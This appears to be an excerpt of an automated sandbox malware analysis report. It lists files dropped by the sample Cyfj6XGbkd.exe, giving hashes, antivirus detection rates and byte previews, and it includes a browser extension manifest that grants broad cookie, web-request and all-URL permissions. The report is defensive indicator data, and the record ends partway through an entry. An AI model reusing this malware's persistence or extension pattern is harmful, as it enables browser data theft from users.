SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Download File
Process:	C:\Users\user\Desktop\Cyfj6XGbkd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4247224
Entropy (8bit):	7.867812997543559
Encrypted:	false
SSDEEP:	49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
MD5:	63204EB716C856723A010747D58A6B00
SHA1:	7E97F00B4C3580CEDEE02C448AC9AEB54AFEFBD2
SHA-256:	6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
SHA-512:	4B00DC3D824D3526972F74B913CFF2B1D0E12745DE58BFE4BA6196088A17B2346B4EC019BDF923ACC57C77F88AA7B17FA230100C6C35B6672C7A39BFA4953C2E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 24%, Browse Antivirus: ReversingLabs, Detection: 59%
Joe Sandbox View:	Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0.......i.............................................. ............... ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Cyfj6XGbkd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_engine.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecvD64F.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1611971443428.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xc79d9d3f, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9857715101388759
Encrypted:	false
SSDEEP:	24576:GPwqTaixuxUxeziYzOAAmiSoTIyHNgSFDb7uBiV:jUxez3Obb
MD5:	E38EA716FFA4A18B5ABBF3BD1E4E1150
SHA1:	EFC35DA2769304DA313194BE4772C9D91BA738EF
SHA-256:	401D182D7F40FD70E02DC5F0605C3410097FF87C0E5479F26F861B15456C4650
SHA-512:	C1C79AEE953DE47C1981E2946A4EA41B1A7A605CEB4D8476691FA86C1C65C1FA12B362F053FED6492F8FDF25C5B7258BB6EFAA9D35DFB47472AC578D431D5CC0
Malicious:	false
Preview:	..?... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. ........2...y.......................................................................................................................................................................................................................................i.S.2...y.c...................A.2...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\Cyfj6XGbkd.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1611971454381 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1611971454428 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611971443428.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
